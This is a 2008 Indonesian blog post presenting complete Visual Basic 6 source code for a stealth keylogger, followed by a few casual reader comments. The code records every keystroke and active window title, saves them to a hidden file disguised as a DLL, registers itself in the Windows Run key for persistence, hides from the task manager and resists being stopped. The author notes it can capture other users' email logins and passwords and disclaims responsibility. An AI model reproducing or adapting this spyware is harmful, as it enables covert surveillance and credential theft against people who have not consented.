06 September 2008

keyloger (pencatat aktivitas log)

oee..temen-temen pernah mendengar ttg keyloger? yupz.. keyloger adalah software yg mencatat gerak-gerik, atau aktifitas tombol yg kita tekan pada keyboard di sebuah Komputer. fungsi KeyLogger sendiri mencatat semua informasi pada sebuah catatan(LOG). Hmm.. dengan keylogger ini kita bisa mengetahui aktivitas user. Misalnya aja user habis buka E-mail, kamu bakalan tau ID-nya si User dan passwordnya
saya sendiri sering kali memakai software ini untuk komputer saya
buat saya sendiri sech, kegunaannya sebatas aktivitas record pribadi,diluar sana sech sering kali dipakai untuk spy sistem.sekarang saya akan menerangkan cara pembuatan software ini dengan menggunakan VB6..seperti biasa artikel yang asaya buat sebatas untuk belajar dan pengetahuan saja..apabila kamu- kamu kenggunakannya untuk keperluan lain..itu sech bukan tanggung jawab saya
silahkan manfaatkan ilmu buat hal-hal yg menurut kamu baik.(kan udah gede..)


Okay... berikut ini source code KeyLogger yang bisa kamu compile pake VB6. Kita
hanya butuh sebuah timer dan module.

Yang perlu diperhatikan :

1. setelah REGSVC32.exe dieksekusi, keylogger tsg akan lg menulis di registry
agar program tsb dieksekusi pd waktu booting:

(hkey_local_machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run).

2. Aktifitas keylogger ini tidak dapat dilihat melalui task manager (Ctrl+Alt+Del)

3. kamu tidak dapat menghapus file REGSVC32.exe (this file is being used by
windows
4. kamu tidak dapat menghentikan booting REGSVC32.exe melalui regedit ato
msconfig

5. Untuk melihat hasil rekaman KeyLogger ini kamu bisa buka file REGSVC32.DLL
dengan Notepad

6. selama Keylogger ini aktif kamu tidak bisa melakukan Logoff user ... :(

======= code mulai ==========================

'simpan file hasil compile dg nama regsvc32.exe

'form

'simpan dg nama FRMLOG.frm

Option Explicit

Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As
Integer

Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal
hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA"
(ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal
dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long

Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal ProcessID
As Long, ByVal ServiceFlags As Long) As Long

Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long

Private sAppName As String

Private Const REG_SZ = 1

Private Const LOCALMACHINE = &H80000002

Private Const RSP_SIMPLE_SERVICE = 1

Private Const RSP_UNREGISTER_SERVICE = 0

Private Const VK_BACK = &H8

Private Const VK_CONTROL = &H11

Private Const VK_SHIFT = &H10

Private Const VK_TAB = &H9

Private Const VK_RETURN = &HD

Private Const VK_MENU = &H12

Private Const VK_ESCAPE = &H1B

Private Const VK_CAPITAL = &H14

Private Const VK_SPACE = &H20

Private Const VK_SNAPSHOT = &H2C

Private Const VK_UP = &H26

Private Const VK_DOWN = &H28

Private Const VK_LEFT = &H25

Private Const VK_RIGHT = &H27

Private Const VK_MBUTTON = &H4

Private Const VK_RBUTTON = &H2

Private Const VK_LBUTTON = &H1

Private Const VK_PERIOD = &HBE

Private Const VK_COMMA = &HBC

Private Const VK_NUMLOCK = &H90

Private Const VK_NUMPAD0 = &H60

Private Const VK_NUMPAD1 = &H61

Private Const VK_NUMPAD2 = &H62

Private Const VK_NUMPAD3 = &H63

Private Const VK_NUMPAD4 = &H64

Private Const VK_NUMPAD5 = &H65

Private Const VK_NUMPAD6 = &H66

Private Const VK_NUMPAD7 = &H67

Private Const VK_NUMPAD8 = &H68

Private Const VK_NUMPAD9 = &H69

Private Const VK_F9 = &H78

Private Const VK_F8 = &H77

Private Const VK_F7 = &H76

Private Const VK_F6 = &H75

Private Const VK_F5 = &H74

Private Const VK_F4 = &H73

Private Const VK_F3 = &H72

Private Const VK_F2 = &H71

Private Const VK_F12 = &H7B

Private Const VK_F11 = &H7A

Private Const VK_F10 = &H79

Private Const VK_F1 = &H70

Private Sub LoadTextFile()

On Error GoTo dlgerror

If Len(App.Path) <= 3 Then  

Open App.Path & "settings.ini" For Input As #1  

Line Input #1, sAppName  

Close  

Else  

Open App.Path & "\settings.ini" For Input As #1  

Line Input #1, sAppName  

Close  

End If  

If sAppName = vbNullString Then  

sAppName = "regsvc32"  

End If  

Exit Sub  

dlgerror:  

sAppName = "regsvc32"  

End Sub  

Private Sub SAVEDLL()  

Dim nSaveLocation As String  

On Error GoTo dlgerror  

If Len(App.Path) <= 3 Then  

Open App.Path & sAppName & ".dll" For Append As #1  

nSaveLocation = App.Path & sAppName & ".dll"  

GoTo READY  

Else  

Open App.Path & "\" & sAppName & ".dll" For Append As #1  

nSaveLocation = App.Path & "\" & sAppName & ".dll"  

GoTo READY  

End If  

READY:  

If txtLOGGED.Text = vbNullString Then  

Exit Sub  

End If  

Print #1, Time & " " & Date & vbCrLf & "Size: " & Format(FileLen(nSaveLocation)  
/ 1000000, ".0") & " MB" & vbCrLf & "*** PROGRAMS OPENED ***" & vbCrLf & vbCrLf  
& txtENUMERATE.Text & vbCrLf & vbCrLf & txtLOGGED.Text & vbCrLf & vbCrLf  

Close  

Close  

Close  

SetAttr nSaveLocation, vbHidden  

Exit Sub  

dlgerror:  

Err.Clear  

Exit Sub  

End Sub  

Private Sub Form_Load()  

On Error Resume Next  

Call LoadTextFile  

Me.Caption = sAppName  

Me.Visible = False  

App.TaskVisible = False  

App.Title = sAppName  

ENTERREGISTRY  

RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE  

End Sub  

Private Sub ENTERREGISTRY()  

Dim nKey As Long  

RegCreateKey LOCALMACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", nKey  

If Len(App.Path) <= 3 Then  

RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & App.EXEName & ".exe", Len(App.Path  
& App.EXEName & ".exe")  

Else  

RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & "\" & App.EXEName & ".exe",  
Len(App.Path & "\" & App.EXEName & ".exe")  

End If  

End Sub  

Private Sub Form_Unload(Cancel As Integer)  

Cancel = True  

Call SAVEDLL  

ENTERREGISTRY  

Unload Me  

End  

End Sub  

Private Sub tmrCAPTION_Timer()  

On Error Resume Next  

Me.Caption = sAppName  

Me.Visible = False  

App.TaskVisible = False  

App.Title = False  

RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE  

End Sub  

Private Sub tmrLOG_Timer()  

On Error Resume Next  

Dim nKey, nChar As Integer  

Dim nText As String  

For nChar = 1 To 255  

nKey = GetAsyncKeyState(nChar)  

If nKey = -32767 Then  

nText = Chr(nChar)  

If nChar = VK_BACK Then  

nText = " {B.S} "  

ElseIf nChar = VK_CONTROL Then  

nText = " {CTRL} "  

ElseIf nChar = VK_SHIFT Then  

nText = " {SHIFT} "  

ElseIf nChar = VK_TAB Then  

nText = " {TAB} "  

ElseIf nChar = VK_RETURN Then  

nText = " {ENTER} "  

ElseIf nChar = VK_MENU Then  

nText = " {ALT} "  

ElseIf nChar = VK_ESCAPE Then  

nText = " {ESC} "  

ElseIf nChar = VK_CAPITAL Then  

nText = " {CAPS} "  

ElseIf nChar = VK_SPACE Then  

nText = " {SP.B} "  

ElseIf nChar = VK_UP Then  

nText = " {UP} "  

ElseIf nChar = VK_LEFT Then  

nText = " {LEFT} "  

ElseIf nChar = VK_RIGHT Then  

nText = " {RIGHT} "  

ElseIf nChar = VK_DOWN Then  

nText = " {DOWN} "  

ElseIf nChar = VK_F1 Then  

nText = " {F1} "  

ElseIf nChar = VK_F2 Then  

nText = " {F2} "  

ElseIf nChar = VK_F3 Then  

nText = " {F3} "  

ElseIf nChar = VK_F4 Then  

nText = " {F4} "  

ElseIf nChar = VK_F5 Then  

nText = " {F5} "  

ElseIf nChar = VK_F6 Then  

nText = " {F6} "  

ElseIf nChar = VK_F7 Then  

nText = " {F7} "  

ElseIf nChar = VK_F8 Then  

nText = " {F8} "  

ElseIf nChar = VK_F9 Then  

nText = "{F9}"  

ElseIf nChar = VK_F10 Then  

nText = " {F10} "  

ElseIf nChar = VK_F11 Then  

nText = " {F11} "  

ElseIf nChar = VK_F12 Then  

nText = " {F12} "  

ElseIf nChar = VK_SNAPSHOT Then  

nText = " {PRINT SCRN} "  

ElseIf nChar = VK_RBUTTON Then  

nText = " {R.B} "  

ElseIf nChar = VK_LBUTTON Then  

nText = " {L.B} "  

ElseIf nChar = VK_MBUTTON Then  

nText = " {M.B} "  

ElseIf nChar = VK_PERIOD Then  

nText = "."  

ElseIf nChar = VK_COMMA Then  

nText = ","  

ElseIf nChar = VK_NUMLOCK Then  

nText = " {NUMLCK} "  

ElseIf nChar = VK_NUMPAD0 Then  

nText = "0"  

ElseIf nChar = VK_NUMPAD1 Then  

nText = "1"  

ElseIf nChar = VK_NUMPAD2 Then  

nText = "2"  

ElseIf nChar = VK_NUMPAD3 Then  

nText = "3"  

ElseIf nChar = VK_NUMPAD4 Then  

nText = "4"  

ElseIf nChar = VK_NUMPAD5 Then  

nText = "5"  

ElseIf nChar = VK_NUMPAD6 Then  

nText = "6"  

ElseIf nChar = VK_NUMPAD7 Then  

nText = "7"  

ElseIf nChar = VK_NUMPAD8 Then  

nText = "8"  

ElseIf nChar = VK_NUMPAD9 Then  

nText = "9"  

End If  

txtLOGGED.Text = txtLOGGED.Text + nText  

End If  

Next  

Call GetActiveWindowName  

End Sub  

Private Sub tmrSAVE_Timer()  

Call SAVEDLL  

txtLOGGED.Text = vbNullString  

txtENUMERATE.Text = vbNullString  

End Sub  

====code end ===========  

============code mulai ============  

'module visual basic  

'simpan dg nama mdlActiveWindow.bas  

Option Explicit  

Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal  
hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long  

Public Declare Function GetForegroundWindow Lib "user32" () As Long  

Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal  
hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long  

Public nCAPTION As String  

Public nTESTER As Long  

Public nClass As String  

Public Sub GetActiveWindowName()  

nCAPTION = Space(256)  

nClass = Space(256)  

GetWindowText GetForegroundWindow, nCAPTION, Len(nCAPTION)  

GetClassName GetForegroundWindow, nClass, Len(nClass)  

If nTESTER = GetForegroundWindow Then Exit Sub  

FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbCrLf & Time & " " &  
nCAPTION  

FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbTab & nClass  

nTESTER = GetForegroundWindow  

End Sub  

============ code end ========== 



Related Posts [Artikel Terkait]



posting by jideblack

Comments :

4 komentar to “keyloger (pencatat aktivitas log)”

wah baru tau nih

asik dapat info lagi dari orang kalimantan lagi

qpin mengatakan...
on 

wah..gawat.... semua yang bunda ketik ketauan dong...(hutang2 di mang sayur, bule kelontongan, pak tukang ikan..ha.ha.ha.ha..semoga suami bunda nggak pake yachhh...

Bunda Rierie mengatakan...
on 

ini baru menarik.....

Batur SASAK mengatakan...
on 

kadang software ini juga ngaco om.. ya.. ntu setau gw.. mungkin karena buatan manusia kali.. he..he///

Masenchipz mengatakan...
on 

Posting Komentar

 
| Info Teknologi | Music | Informatika | Blogger Tips | SEO Blogger Indonesia Counter Powered by  RedCounter

Info teknologi free download download mp3 info tips rach-man facebook tutorial free lyrik 3gp lokal avi forum no free sex haram sekolah smu gratis uang kaya optimasi video indonesia lokal gadis cantik murah musik new perawan search update teknik SEO Adsense blog indonesia jide palangkaraya komputer hardware jaringan bali virgin anti virus